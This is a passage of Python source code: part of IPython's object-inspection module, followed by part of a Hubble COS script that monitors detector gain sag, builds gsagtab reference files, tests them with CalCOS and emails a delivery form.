# SWIG-wrapped extensions.
raise
return None
def getsource(obj,is_binary=False):
"""Wrapper around inspect.getsource.
This can be modified by other projects to provide customized source
extraction.
Inputs:
- obj: an object whose source code we will attempt to extract.
Optional inputs:
- is_binary: whether the object is known to come from a binary source.
This implementation will skip returning any output for binary objects, but
custom extractors may know how to meaningfully process them."""
if is_binary:
return None
else:
# get source if obj was decorated with @decorator
if hasattr(obj,"__wrapped__"):
obj = obj.__wrapped__
try:
src = inspect.getsource(obj)
except TypeError:
if hasattr(obj,'__class__'):
src = inspect.getsource(obj.__class__)
encoding = get_encoding(obj)
return cast_unicode(src, encoding=encoding)
def getargspec(obj):
"""Get the names and default values of a function's arguments.
A tuple of four things is returned: (args, varargs, varkw, defaults).
'args' is a list of the argument names (it may contain nested lists).
'varargs' and 'varkw' are the names of the * and ** arguments or None.
'defaults' is an n-tuple of the default values of the last n arguments.
Modified version of inspect.getargspec from the Python Standard
Library."""
if inspect.isfunction(obj):
func_obj = obj
elif inspect.ismethod(obj):
func_obj = obj.im_func
elif hasattr(obj, '__call__'):
func_obj = obj.__call__
else:
raise TypeError('arg is not a Python function')
args, varargs, varkw = inspect.getargs(func_obj.func_code)
return args, varargs, varkw, func_obj.func_defaults
def format_argspec(argspec):
"""Format argspect, convenience wrapper around inspect's.
This takes a dict instead of ordered arguments and calls
inspect.format_argspec with the arguments in the necessary order.
"""
return inspect.formatargspec(argspec['args'], argspec['varargs'],
argspec['varkw'], argspec['defaults'])
def call_tip(oinfo, format_call=True):
"""Extract call tip data from an oinfo dict.
Parameters
----------
oinfo : dict
format_call : bool, optional
If True, the call line is formatted and returned as a string. If not, a
tuple of (name, argspec) is returned.
Returns
-------
call_info : None, str or (str, dict) tuple.
When format_call is True, the whole call information is formattted as a
single string. Otherwise, the object's name and its argspec dict are
returned. If no call information is available, None is returned.
docstring : str or None
The most relevant docstring for calling purposes is returned, if
available. The priority is: call docstring for callable instances, then
constructor docstring for classes, then main object's docstring otherwise
(regular functions).
"""
# Get call definition
argspec = oinfo.get('argspec')
if argspec is None:
call_line = None
else:
# Callable objects will have 'self' as their first argument, prune
# it out if it's there for clarity (since users do *not* pass an
# extra first argument explicitly).
try:
has_self = argspec['args'][0] == 'self'
except (KeyError, IndexError):
pass
else:
if has_self:
argspec['args'] = argspec['args'][1:]
call_line = oinfo['name']+format_argspec(argspec)
# Now get docstring.
# The priority is: call docstring, constructor docstring, main one.
doc = oinfo.get('call_docstring')
if doc is None:
doc = oinfo.get('init_docstring')
if doc is None:
doc = oinfo.get('docstring','')
return call_line, doc
def safe_hasattr(obj, attr):
"""In recent versions of Python, hasattr() only catches AttributeError.
This catches all errors.
"""
try:
getattr(obj, attr)
return True
except:
return False
def find_file(obj):
"""Find the absolute path to the file where an object was defined.
This is essentially a robust wrapper around `inspect.getabsfile`.
Returns None if no file can be found.
Parameters
----------
obj : any Python object
Returns
-------
fname : str
The absolute path to the file where the object was defined.
"""
# get source if obj was decorated with @decorator
if safe_hasattr(obj, '__wrapped__'):
obj = obj.__wrapped__
fname = None
try:
fname = inspect.getabsfile(obj)
except TypeError:
# For an instance, the file that matters is where its class was
# declared.
if hasattr(obj, '__class__'):
try:
fname = inspect.getabsfile(obj.__class__)
except TypeError:
# Can happen for builtins
pass
except:
pass
return cast_unicode(fname)
def find_source_lines(obj):
"""Find the line number in a file where an object was defined.
This is essentially a robust wrapper around `inspect.getsourcelines`.
Returns None if no file can be found.
Parameters
----------
obj : any Python object
Returns
-------
lineno : int
The line number where the object definition starts.
"""
# get source if obj was decorated with @decorator
if safe_hasattr(obj, '__wrapped__'):
obj = obj.__wrapped__
try:
try:
lineno = inspect.getsourcelines(obj)[1]
except TypeError:
# For instances, try the class object like getsource() does
if hasattr(obj, '__class__'):
lineno = inspect.getsourcelines(obj.__class__)[1]
else:
lineno = None
except:
return None
return lineno
class Inspector:
def __init__(self, color_table=InspectColors,
code_color_table=PyColorize.ANSICodeColors,
scheme='NoColor',
str_detail_level=0):
self.color_table = color_table
self.parser = PyColorize.Parser(code_color_table,out='str')
self.format = self.parser.format
self.str_detail_level = str_detail_level
self.set_active_scheme(scheme)
def _getdef(self,obj,oname=''):
"""Return the call signature for any callable object.
If any exception is generated, None is returned instead and the
exception is suppressed."""
try:
hdef = oname + inspect.formatargspec(*getargspec(obj))
return cast_unicode(hdef)
except:
return None
def __head(self,h):
"""Return a header string with proper colors."""
return '%s%s%s' % (self.color_table.active_colors.header,h,
self.color_table.active_colors.normal)
def set_active_scheme(self, scheme):
self.color_table.set_active_scheme(scheme)
self.parser.color_table.set_active_scheme(scheme)
def noinfo(self, msg, oname):
"""Generic message when no information is found."""
print('No %s found' % msg, end=' ')
if oname:
print('for %s' % oname)
else:
print()
def pdef(self, obj, oname=''):
"""Print the call signature for any callable object.
If the object is a class, print the constructor information."""
if not callable(obj):
print('Object is not callable.')
return
header = ''
if inspect.isclass(obj):
header = self.__head('Class constructor information:\n')
obj = obj.__init__
elif (not py3compat.PY3) and type(obj) is types.InstanceType:
obj = obj.__call__
output = self._getdef(obj,oname)
if output is None:
self.noinfo('definition header',oname)
else:
print(header,self.format(output), end=' ', file=io.stdout)
# In Python 3, all classes are new-style, so they all have __init__.
@skip_doctest_py3
def pdoc(self,obj,oname='',formatter = None):
"""Print the docstring for any object.
Optional:
-formatter: a function to run the docstring through for specially
formatted docstrings.
Examples
--------
In [1]: class NoInit:
...: pass
In [2]: class NoDoc:
...: def __init__(self):
...: pass
In [3]: %pdoc NoDoc
No documentation found for NoDoc
In [4]: %pdoc NoInit
No documentation found for NoInit
In [5]: obj = NoInit()
In [6]: %pdoc obj
No documentation found for obj
In [5]: obj2 = NoDoc()
In [6]: %pdoc obj2
No documentation found for obj2
"""
head = self.__head # For convenience
lines = []
ds = getdoc(obj)
if formatter:
ds = formatter(ds)
if ds:
lines.append(head("Class Docstring:"))
lines.append(indent(ds))
if inspect.isclass(obj) and hasattr(obj, '__init__'):
init_ds = getdoc(obj.__init__)
if init_ds is not None:
lines.append(head("Constructor Docstring:"))
lines.append(indent(init_ds))
elif hasattr(obj,'__call__'):
call_ds = getdoc(obj.__call__)
if call_ds:
lines.append(head("Calling Docstring:"))
lines.append(indent(call_ds))
if not lines:
self.noinfo('documentation',oname)
else:
page.page('\n'.join(lines))
def psource(self,obj,oname=''):
"""Print the source code for an object."""
# Flush the source cache because inspect can return out-of-date source
linecache.checkcache()
try:
src = getsource(obj)
except:
self.noinfo('source',oname)
else:
page.page(self.format(src))
def pfile(self, obj, oname=''):
"""Show the whole file where an object was defined."""
lineno = find_source_lines(obj)
if lineno is None:
self.noinfo('file', oname)
return
ofile = find_file(obj)
# run contents of file through pager starting at line where the object
# is defined, as long as the file isn't binary and is actually on the
# filesystem.
if ofile.endswith(('.so', '.dll', '.pyd')):
print('File %r is binary, not printing.' % ofile)
elif not os.path.isfile(ofile):
print('File %r does not exist, not printing.' % ofile)
else:
# Print only text files, not extension binaries. Note that
# getsourcelines returns lineno with 1-offset and page() uses
# 0-offset, so we must adjust.
page.page(self.format(openpy.read_py_file(ofile, skip_encoding_cookie=False)), lineno - 1)
def _format_fields(self, fields, title_width=12):
"""Formats a list of fields for display.
Parameters
----------
fields : list
A list of 2-tuples: (field_title, field_content)
title_width : int
How many characters to pad titles to. Default 12.
"""
out = []
header = self.__head
for title, content in fields:
if len(content.splitlines()) > 1:
title = header(title + ":") + "\n"
else:
title = header((title+":").ljust(title_width))
out.append(cast_unicode(title) + cast_unicode(content))
return "\n".join(out)
# The fields to be displayed by pinfo: (fancy_name, key_in_info_dict)
pinfo_fields1 = [("Type", "type_name"),
]
pinfo_fields2 = [("String Form", "string_form"),
]
pinfo_fields3 = [("Length", "length"),
("File", "file"),
("Definition", "definition"),
]
pinfo_fields_obj = [("Class Docstring", "class_docstring"),
("Constructor Docstring","init_docstring"),
("Call def", "call_def"),
("Call docstring", "call_docstring")]
def pinfo(self,obj,oname='',formatter=None,info=None,detail_level=0):
"""Show detailed information about an object.
Optional arguments:
- oname: name of the variable pointing to the object.
- formatter: special formatter for docstrings (see pdoc)
- info: a structure with some information fields which may have been
precomputed already.
- detail_level: if set to 1, more information is given.
"""
info = self.info(obj, oname=oname, formatter=formatter,
info=info, detail_level=detail_level)
displayfields = []
def add_fields(fields):
for title, key in fields:
field = info[key]
if field is not None:
displayfields.append((title, field.rstrip()))
add_fields(self.pinfo_fields1)
# Base class for old-style instances
if (not py3compat.PY3) and isinstance(obj, types.InstanceType) and info['base_class']:
displayfields.append(("Base Class", info['base_class'].rstrip()))
add_fields(self.pinfo_fields2)
# Namespace
if info['namespace'] != 'Interactive':
displayfields.append(("Namespace", info['namespace'].rstrip()))
add_fields(self.pinfo_fields3)
# Source or docstring, depending on detail level and whether
# source found.
if detail_level > 0 and info['source'] is not None:
displayfields.append(("Source",
self.format(cast_unicode(info['source']))))
elif info['docstring'] is not None:
displayfields.append(("Docstring", info["docstring"]))
# Constructor info for classes
if info['isclass']:
if info['init_definition'] or info['init_docstring']:
displayfields.append(("Constructor information", ""))
if info['init_definition'] is not None:
displayfields.append((" Definition",
info['init_definition'].rstrip()))
if info['init_docstring'] is not None:
displayfields.append((" Docstring",
indent(info['init_docstring'])))
# Info for objects:
else:
add_fields(self.pinfo_fields_obj)
# Finally send to printer/pager:
if displayfields:
page.page(self._format_fields(displayfields))
def info(self, obj, oname='', formatter=None, info=None, detail_level=0):
"""Compute a dict with detailed information about an object.
Optional arguments:
- oname: name of the variable pointing to the object.
- formatter: special formatter for docstrings (see pdoc)
- info: a structure with some information fields which may have been
precomputed already.
- detail_level: if set to 1, more information is given.
"""
obj_type = type(obj)
header = self.__head
if info is None:
ismagic = 0
isalias = 0
ospace = ''
else:
ismagic = info.ismagic
isalias = info.isalias
ospace = info.namespace
# Get docstring, special-casing aliases:
if isalias:
if not callable(obj):
try:
ds = "Alias to the system command:\n %s" % obj[1]
except:
ds = "Alias: " + str(obj)
else:
ds = "Alias to " + str(obj)
if obj.__doc__:
ds += "\nDocstring:\n" + obj.__doc__
else:
ds = getdoc(obj)
if ds is None:
ds = '<no docstring>'
if formatter is not None:
ds = formatter(ds)
# store output in a dict, we initialize it here and fill it as we go
out = dict(name=oname, found=True, isalias=isalias, ismagic=ismagic)
string_max = 200 # max size of strings to show (snipped if longer)
shalf = int((string_max -5)/2)
if ismagic:
obj_type_name = 'Magic function'
elif isalias:
obj_type_name = 'System alias'
else:
obj_type_name = obj_type.__name__
out['type_name'] = obj_type_name
try:
bclass = obj.__class__
out['base_class'] = str(bclass)
except: pass
# String form, but snip if too long in ? form (full in ??)
if detail_level >= self.str_detail_level:
try:
ostr = str(obj)
str_head = 'string_form'
if not detail_level and len(ostr)>string_max:
ostr = ostr[:shalf] + ' <...> ' + ostr[-shalf:]
ostr = ("\n" + " " * len(str_head.expandtabs())).\
join(q.strip() for q in ostr.split("\n"))
out[str_head] = ostr
except:
pass
if ospace:
out['namespace'] = ospace
# Length (for strings and lists)
try:
out['length'] = str(len(obj))
except: pass
# Filename where object was defined
binary_file = False
fname = find_file(obj)
if fname is None:
# if anything goes wrong, we don't want to show source, so it's as
# if the file was binary
binary_file = True
else:
if fname.endswith(('.so', '.dll', '.pyd')):
binary_file = True
elif fname.endswith('<string>'):
fname = 'Dynamically generated function. No source code available.'
out['file'] = fname
# reconstruct the function definition and print it:
defln = self._getdef(obj, oname)
if defln:
out['definition'] = self.format(defln)
# Docstrings only in detail 0 mode, since source contains them (we
# avoid repetitions). If source fails, we add them back, see below.
if ds and detail_level == 0:
out['docstring'] = ds
# Original source code for any callable
if detail_level:
# Flush the source cache because inspect can return out-of-date
# source
linecache.checkcache()
source = None
try:
try:
source = getsource(obj, binary_file)
except TypeError:
if hasattr(obj, '__class__'):
source = getsource(obj.__class__, binary_file)
if source is not None:
out['source'] = source.rstrip()
except Exception:
pass
if ds and source is None:
out['docstring'] = ds
# Constructor docstring for classes
if inspect.isclass(obj):
out['isclass'] = True
# reconstruct the function definition and print it:
try:
obj_init = obj.__init__
except AttributeError:
init_def = init_ds = None
else:
init_def = self._getdef(obj_init,oname)
init_ds = getdoc(obj_init)
# Skip Python's auto-generated docstrings
if init_ds == _object_init_docstring:
init_ds = None
if init_def or init_ds:
if init_def:
out['init_definition'] = self.format(init_def)
if init_ds:
out['init_docstring'] = init_ds
# and class docstring for instances:
else:
# First, check whether the instance docstring is identical to the
# class one, and print it separately if they don't coincide. In
# most cases they will, but it's nice to print all the info for
# objects which use instance-customized docstrings.
if ds:
try:
cls = getattr(obj,'__class__')
except:
class_ds = None
else:
class_ds = getdoc(cls)
# Skip Python's auto-generated docstrings
if class_ds in _builtin_type_docstrings:
class_ds = None
if class_ds and ds != class_ds:
out['class_docstring'] = class_ds
# Next, try to show constructor docstrings
try:
init_ds = getdoc(obj.__init__)
# Skip Python's auto-generated docstrings
if init_ds == _object_init_docstring:
init_ds = None
except AttributeError:
init_ds = None
if init_ds:
out['init_docstring'] = init_ds
# Call form docstring for callable instances
if safe_hasattr(obj, '__call__'):
call_def = self._getdef(obj.__call__, oname)
if call_def is not None:
out['call_def'] = self.format(call_def)
call_ds = getdoc(obj.__call__)
# Skip Python's auto-generated docstrings
if call_ds == _func_call_docstring:
call_ds = None
if call_ds:
out['call_docstring'] = call_ds
# Compute the object's argspec as a callable. The key is to decide
# whether to pull it from the object itself, from its __init__ or
# from its __call__ method.
if inspect.isclass(obj):
# Old-style classes need not have an __init__
callable_obj = getattr(obj, "__init__", None)
elif callable(obj):
callable_obj = obj
else:
callable_obj = None
if callable_obj:
try:
args, varargs, varkw, defaults = getargspec(callable_obj)
except (TypeError, AttributeError):
# For extensions/builtins we can't retrieve the argspec
pass
else:
out['argspec'] = dict(args=args, varargs=varargs,
varkw=varkw, defaults=defaults)
return object_info(**out)
def psearch(self,pattern,ns_table,ns_search=[],
ignore_case=False,show_all=False):
"""Search namespaces with wildcards for objects.
Arguments:
- pattern: string containing shell-like wildcards to use in namespace
searches and optionally a type specification to narrow the search to
objects of that type.
- ns_table: dict of name->namespaces for search.
Optional arguments:
- ns_search: list of namespace names to include in search.
- ignore_case(False): make the search case-insensitive.
- show_all(False): show all names, including those starting with
underscores.
"""
#print 'ps pattern:<%r>' % pattern # dbg
# defaults
type_pattern = 'all'
filter = ''
cmds = pattern.split()
len_cmds = len(cmds)
if len_cmds == 1:
# Only filter pattern given
filter = cmds[0]
elif len_cmds == 2:
# Both filter and type specified
filter,type_pattern = cmds
else:
raise ValueError('invalid argument string for psearch: <%s>' %
pattern)
# filter search namespaces
for name in ns_search:
if name not in ns_table:
raise ValueError('invalid namespace <%s>. Valid names: %s' %
(name,ns_table.keys()))
#print 'type_pattern:',type_pattern # dbg
search_result, namespaces_seen = set(), set()
for ns_name in ns_search:
ns = ns_table[ns_name]
# Normally, locals and globals are the same, so we just check one.
if id(ns) in namespaces_seen:
continue
namespaces_seen.add(id(ns))
tmp_res = list_namespace(ns, type_pattern, filter,
ignore_case=ignore_case, show_all=show_all)
search_result.update(tmp_res)
page.page('\n'.join(sorted(search_result)))
|
|
"""Routine to monitor the modal gain in each pixel as a
function of time. Uses COS Cumulative Image (CCI) files
to produce a modal gain map for each time period. Modal gain
maps for each period are collated to monitor the progress of
each pixel(superpixel) with time. Pixels that drop below
a threshold value are flagged and collected into a
gain sag table reference file (gsagtab).
The PHA modal gain threshold is set by global variable MODAL_GAIN_LIMIT.
Allowing the modal gain of a distribution to come within 1 gain bin
of the threshold results in ~8% loss of flux. Within
2 gain bins, ~4%
3 gain bins, ~2%
4 gain bins, ~1%
However, due to the column summing, a 4% loss in a region does not appear to be so in the extracted spectrum.
"""
__author__ = 'Justin Ely'
__maintainer__ = 'Justin Ely'
__email__ = '[email protected]'
__status__ = 'Active'
import os
import shutil
import time
from datetime import datetime
import glob
import sys
from sqlalchemy.engine import create_engine
import logging
logger = logging.getLogger(__name__)
from astropy.io import fits
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
from sqlalchemy.sql.functions import concat
from ..database.db_tables import open_settings, load_connection
from ..utils import send_email
from .constants import * #Shut yo face
#------------------------------------------------------------
def main(data_dir, run_regress=False):
""" Main driver for monitoring program.
"""
new_gsagtab = make_gsagtab_db(data_dir, blue=False)
blue_gsagtab = make_gsagtab_db(data_dir, blue=True)
old_gsagtab = get_cdbs_gsagtab()
compare_gsag(new_gsagtab, old_gsagtab, data_dir)
if run_regress:
test_gsag_calibration(new_gsagtab)
else:
print("Regression set skipped")
send_forms(data_dir)
#------------------------------------------------------------
def get_index( gsag, segment, dethv ):
"""
Returns extension index of gsagtab with corresponding
segment and dethv
"""
found_ext = -1
if segment == 'FUVA':
hv_string = 'HVLEVELA'
elif segment == 'FUVB':
hv_string = 'HVLEVELB'
for i,ext in enumerate( gsag[1:] ):
if ext.header['segment'] == segment:
if ext.header[hv_string] == dethv:
found_ext = (i+1)
break
return found_ext
#------------------------------------------------------------
def compare_gsag(new, old, outdir):
"""Compare two gainsag tables to see what has changed
"""
### Needs to be tested ###
logger.debug("Comparing new: {} to old: {}".format(new, old))
if type(new) == str:
new = fits.open(new)
if type(old) == str:
old = fits.open(old)
report_file = open(os.path.join(outdir, 'gsag_report.txt'), 'w')
possible_hv_levels = [0,100] + list(range(100,179))
for segment,hv_keyword in zip( ['FUVA','FUVB'], ['HVLEVELA','HVLEVELB'] ):
new_hv = set( [ ext.header[hv_keyword] for ext in new[1:] if ext.header['SEGMENT'] == segment ] )
old_hv = set( [ ext.header[hv_keyword] for ext in old[1:] if ext.header['SEGMENT'] == segment ] )
only_new_hv = new_hv.difference( old_hv )
only_old_hv = old_hv.difference( new_hv )
both_hv = list( new_hv.union( old_hv ) )
both_hv.sort()
#assert ( len(only_old_hv) == 0 ),'There is an HV value found in the old table that is not found in the new.'
if len(only_old_hv) > 0:
logger.warning('There is an HV value found in the old table that is not found in the new.')
if len( only_new_hv ):
logger.warning("There is at least one new extension, this file should probably be delivered")
report_file.write('There is at least one new extension, you should probably deliver this one \n')
report_file.write('New HV extensions:\n')
report_file.write(','.join( map(str,np.sort( list(only_new_hv) ) ) ) )
report_file.write('\n')
for hv in both_hv:
report_file.write( '#----- %d \n'%(hv) )
old_ext_index = get_index( old, segment, hv )
new_ext_index = get_index( new, segment, hv )
if old_ext_index == -1:
logger.warning('%s %d: not found in old table'%(segment, hv))
continue
if new_ext_index == -1:
logger.warning('%s %d: not found in new table'%( segment, hv ))
continue
else:
old_ext = old[ old_ext_index ]
new_ext = new[ new_ext_index ]
#Get (y,x,mjd) triple for each flagged region. Assumes binning is the same
old_regions = set( [ (y,x,mjd) for x,y,mjd in
zip(old_ext.data['ly'], old_ext.data['lx'], old_ext.data['Date']) ] )
new_regions = set( [ (y,x,mjd) for x,y,mjd in
zip(new_ext.data['ly'], new_ext.data['lx'], new_ext.data['Date']) ] )
#Strip triple down to (y,x) coordinate pair to check just locations
old_coords = set( [ (item[0],item[1]) for item in old_regions ] )
new_coords = set( [ (item[0],item[1]) for item in new_regions ] )
only_old_coords = old_coords.difference( new_coords )
only_new_coords = new_coords.difference( old_coords )
both_coords = old_coords.union( new_coords )
N_old = len(only_old_coords)
N_new = len(only_new_coords)
#pdb.set_trace()
if not (N_old or N_new):
report_file.write( 'Nothing added or deleted \n')
if N_old > 0:
logger.warning(' %s %d: You apparently got rid of %d from the old table'%(segment, hv, N_old))
report_file.write( '%d entries have been removed from the old table. \n'%(N_old) )
report_file.write( '\n'.join( map(str,only_old_coords) ) )
report_file.write('\n\n')
if N_new > 0:
logger.debug('%s %d: You added %d to the new table'%( segment, hv, N_new ))
report_file.write( '%d entries have been added to the new table. \n'%( N_new ) )
report_file.write( '\n'.join( map(str,only_new_coords) ) )
report_file.write('\n\n')
for old_y,old_x,old_mjd in old_regions:
coord_pair = (old_y,old_x)
if coord_pair not in both_coords: continue
###again, may be confusing syntax
for new_y,new_x,new_mjd in new_regions:
if (new_y,new_x) == coord_pair:
break
mjd_difference = old_mjd - new_mjd
if mjd_difference:
logger.debug('MJD difference of {} days at (y,x) {}'.format(mjd_difference, coord_pair))
report_file.write( 'MJD difference of %5.7f days at (y,x): (%d,%d)'%(mjd_difference,coord_pair[0],coord_pair[1]) )
#------------------------------------------------------------
def test_gsag_calibration(gsagtab):
"""Move gsagtab into TEST_DIR and calibrate with CalCOS.
Any datasets that fail calibration will be emailed to the user.
"""
print('#-------------------------#')
print('Calibrating with %s'%(gsagtab))
print('#-------------------------#')
os.environ['testdir'] = TEST_DIR
if not os.path.exists(TEST_DIR):
os.mkdir(TEST_DIR)
shutil.copy( gsagtab ,os.path.join(TEST_DIR,'new_gsag.fits') )
test_datasets = glob.glob( os.path.join(TEST_DIR, '*rawtag_a.fits') )
#Remove products
for ext in ('*_counts*.fits','*_flt*.fits','*_x1d*.fits','*lampflash*.fits','*corrtag*.fits'):
os.system('rm '+TEST_DIR+'/'+ext)
for item in test_datasets:
fits.setval( item,'RANDSEED',value=8675309,ext=0 )
fits.setval( item,'GSAGTAB',value='testdir$new_gsag.fits',ext=0 )
failed_runs = []
for item in test_datasets:
try:
status = calcos.calcos( item,outdir=TEST_DIR )
print(("CalCOS exit status is",status))
except:
failed_runs.append( item )
if status != 0:
failed_runs.append( item )
if len(failed_runs):
send_email(subject='GSAGTAB Calibration Error',message='Failed calibration\n\n'+'\n'+'\n'.join(failed_runs) )
###Now run some quick test.
#------------------------------------------------------------
def send_forms(data_dir):
"""Compose CDBS delivery form and email a copy to user
"""
###Needs some modifications
today_obj = datetime.today()
today = str(today_obj.month)+'/'+str(today_obj.day)+'/'+str(today_obj.year)
message = '1-Name of deliverer: Justin Ely\n'
message += ' (other e-mail addresses) [email protected],[email protected],\n'
message += '[email protected],[email protected]\n'
message += '\n'
message += ' 2-Date of delivery: '+today+'\n'
message += '\n'
message += ' 3-Instrument: COS \n'
message += '\n'
message += ' 4-Type of file (bias,pht,etc.): gsag \n'
message += '\n'
message += ' 5-Has HISTORY section in header [0] been updated to describe in detail\n'
message += ' why it is being delivered and how the file was created? (yes/no): yes \n'
message += '\n'
message += ' 6-USEAFTER, PEDIGREE, DESCRIP, and COMMENT have been checked? yes \n'
message += '\n'
message += ' 6a-Was the DESCRIP keyword updated with a summary of why the file was updated or created? \n'
message += ' (yes/no) yes \n'
message += '\n'
message += ' 6b-If the reference files are replacing previous versions, do the new USEAFTER dates \n'
message += ' exactly match the old ones? yes \n'
message += '\n'
message += ' 7-CDBS Verification complete? (fitsverify,certify,etc.): yes \n'
message += '\n'
message += ' 8-Should these files be ingested in the OPUS, DADS and CDBS databases? yes \n'
message += ' (if not indicate it clearly which ones):\n'
message += '\n'
message += ' 8a-If files are synphot files, should they be delivered to ETC? N/A\n'
message += '\n'
message += ' 9-Files run through CALXXX or SYNPHOT in the IRAF version of STSDAS and the IRAF* \n'
message += ' version used by the Archive pipeline? (yes/no): yes \n'
message += ' List the versions used: CalCOS v 2.18.5 \n'
message += '\n'
message += ' 10-Does it replace an old reference file? (yes/no): yes \n'
message += '\n'
message += ' 10a-If yes, which one? \n'
message += ' (If the file being replaced is bad, and should not be used with any data, please\n'
message += ' indicate this here.)\n'
message += '\n'
message += ' 11- What is the level of change of the file? (e.g. compared to old file it\n'
message += ' could be: SEVERE, MODERATE, TRIVIAL, 1\%, 5\% etc.): SEVERE\n'
message += '\n'
message += ' 11a-If files are tables, please indicate exactly which rows have changed. Show output \n'
message += ' of compare_table.pro.\n'
message += ' Table was compared to the previous by the compare_gsag function in gsag.py as part\n'
message += ' of the monitor.py routine monitoring program. This function tests if any HV extensions \n'
message += ' are added or removed, and if individual flagged regions have changed in each HV extension. \n'
message += ' A summary difference report is generated and checked to ensure all changes are desired, along\n'
message += ' with follow-up graphical representations for the table impact on data. \n'
message += '\n'
message += ' 12-Please indicate which modes (e.g. all the STIS,FUVMAMA,E140l moes) are affected by the \n'
message += ' changes in the file. \n'
message += ' All COS FUV modes are affected by this file. \n'
message += '\n'
message += ' 13-Description of how the files were "tested" for correctness: CalCOS v 2.18.5 was run \n'
message += ' on a test suite of data to ensure no calibration errors were introduced with this file. \n'
message += ' Additionally, the regions flagged in this file have been overplotted to modal gain maps\n'
message += ' of every DETHV level for each week since operations began to ensure that flagged regions\n'
message += ' always overlay areas of low modal gain\n'
message += '\n'
message += ' 14-Additional Considerations: \n'
message += '\n'
message += ' 15-Reason for delivery: New regions have been identified as "bad" and need to be flagged and \n'
message += ' removed in the final extracted spectra.\n'
message += '\n '
message += '16-Disk location and name of files:\n'
initial_dir = os.getcwd()
os.chdir( data_dir )
message += os.getcwd()+'\n'
here = os.getcwd()
os.system('ls -la gsag_%s.fits > tmp.txt'%(TIMESTAMP) )
tmp = open('tmp.txt','r')
for line in tmp.readlines():
message += line
os.remove('tmp.txt')
delivery_form = open( os.path.join( data_dir, 'deliveryform.txt'),'w' )
delivery_form.write(message)
try:
send_email(subject='COS GSAGTAB Delivery Form',message=message)
except:
logger.warning("could not send delivery form")
#------------------------------------------------------------
def get_coords(txt):
"""Grabs coordinates from flagged bad txt file
"""
coords = []
lines = []
try:
lines = np.genfromtxt(txt, dtype=None, skiprows=2)
coords = [(line[0],line[1]) for line in lines]
except:
pass
return coords,lines
#------------------------------------------------------------
def populate_down(gsag_file):
"""Copies found locations from one HV level to each lower
HV level if the coords have not already been flagged.
A regions will always be flagged at the MJD found in that
HV setting, if it has been found. Else, the MJD will be
the time when the region was flagged in the higher HV
setting. In the event we go back down to a lower voltage,
and a region is newly flagged as bad in that HV, it is
possible that the MJD would change from one gsagtab to
the next. This does not pose a problem for data as no
data will have been taken at the lower HV in the
intervening time.
"""
print('#---------------------------------------------#')
print('Populating flagged regions to lower HV settings')
print('#---------------------------------------------#')
gsagtab = fits.open(gsag_file)
for segment,hv_keyword in zip( ['FUVA','FUVB'], ['HVLEVELA','HVLEVELB'] ):
all_hv = [ (ext.header[hv_keyword],i+1) for i,ext in enumerate(gsagtab[1:]) if ext.header['segment'] == segment ]
all_hv.sort()
for current_dethv,current_ext in all_hv:
current_lines = [ tuple(line) for line in gsagtab[current_ext].data[0].array ]
current_coords= [ (line[1],line[2]) for line in current_lines ]
N_changes = 0
for higher_dethv,higher_ext in all_hv:
if not (higher_dethv > current_dethv):
continue
higher_lines = [ tuple(line) for line in gsagtab[higher_ext].data[0].array ]
higher_coords= [ (line[1],line[2]) for line in higher_lines ]
for coord, line in zip(higher_coords,higher_lines):
if not (coord in current_coords):
# If coordinate from higher HV is not in current HV, append
current_lines.append( line )
current_coords.append( (line[1],line[2]) )
N_changes += 1
else:
# If coordinated from higher HV is in current HV,
# check to see if MJD is earlier. If yes, take new value.
# MJD is first element in tuple e.g. line[0]
index = current_coords.index( coord )
current_line = current_lines[index]
if line[0] < current_line[0]:
current_lines[ index ] = line
print(('--Earlier time found',line[0],'-->',current_line[0]))
N_changes += 1
if N_changes:
print(('Updating %s/%d ext:%d with %d changes'%(segment,current_dethv,current_ext,N_changes)))
current_lines.sort()
date = [ line[0] for line in current_lines ]
lx = [ line[1] for line in current_lines ]
ly = [ line[2] for line in current_lines ]
dx = [ line[3] for line in current_lines ]
dy = [ line[4] for line in current_lines ]
dq = [ line[5] for line in current_lines ]
gsagtab[current_ext] = gsagtab_extension(date, lx, dx, ly, dy, dq, current_dethv, hv_keyword, segment)
else:
print(('No Changes to %s/%d ext:%d '%(segment,current_dethv,current_ext)))
gsagtab.writeto(gsag_file,clobber=True)
#------------------------------------------------------------
def gsagtab_extension(date, lx, dx, ly, dy, dq, dethv, hv_string, segment):
"""Creates a properly formatted gsagtab table from input columns
"""
lx = np.array(lx)
ly = np.array(ly)
dx = np.array(dx)
dy = np.array(dy)
dq = np.array(dq)
date_col = fits.Column('DATE','D','MJD',array=date)
lx_col = fits.Column('LX','J','pixel',array=lx)
dx_col = fits.Column('DX','J','pixel',array=dx)
ly_col = fits.Column('LY','J','pixel',array=ly)
dy_col = fits.Column('DY','J','pixel',array=dy)
dq_col = fits.Column('DQ','J','',array=dq)
tab = fits.TableHDU.from_columns([date_col,lx_col,ly_col,dx_col,dy_col,dq_col])
tab.header.add_comment(' ',after='TFIELDS')
tab.header.add_comment(' *** Column formats ***',after='TFIELDS')
tab.header.add_comment(' ',after='TFIELDS')
tab.header.set(hv_string, dethv, after='TFIELDS',comment='High voltage level')
tab.header.set('SEGMENT', segment, after='TFIELDS')
tab.header.add_comment(' ',after='TFIELDS')
tab.header.add_comment(' *** End of mandatory fields ***',after='TFIELDS')
tab.header.add_comment(' ',after='TFIELDS')
return tab
#------------------------------------------------------------
def date_string( date_time ):
""" Takes a datetime object and returns
a pedigree formatted string.
"""
day = str(date_time.day)
month = str(date_time.month)
year = str(date_time.year)
if len(day) < 2:
day = '0' + day
if len(month) < 2:
month = '0' + month
return day + '/' + month + '/' + year
#------------------------------------------------------------
def make_gsagtab():
"""Create GSAGTAB from flagged locations.
Grabs txt files of flagged bad regions from MONITOR_DIR
and combines them into a gsagtab.
Parameters
----------
None
Returns
-------
None
Products
--------
new_gsagtab.fits
"""
logger.info('Making new GSAGTAB')
out_fits = os.path.join(MONITOR_DIR,'gsag_%s.fits'%(TIMESTAMP) )
input_list = glob.glob(os.path.join(MONITOR_DIR,'flagged_bad_??_cci_???.txt'))
input_list.sort()
#Populates regions found in HV == X, Segment Y, to any
#extensions of lower HV for same segment.
hdu_out=fits.HDUList(fits.PrimaryHDU())
date_time = str(datetime.now())
date_time = date_time.split()[0]+'T'+date_time.split()[1]
hdu_out[0].header['DATE'] = (date_time,'Creation UTC (CCCC-MM-DD) date')
hdu_out[0].header['TELESCOP'] = 'HST'
hdu_out[0].header['INSTRUME'] = 'COS'
hdu_out[0].header['DETECTOR'] = 'FUV'
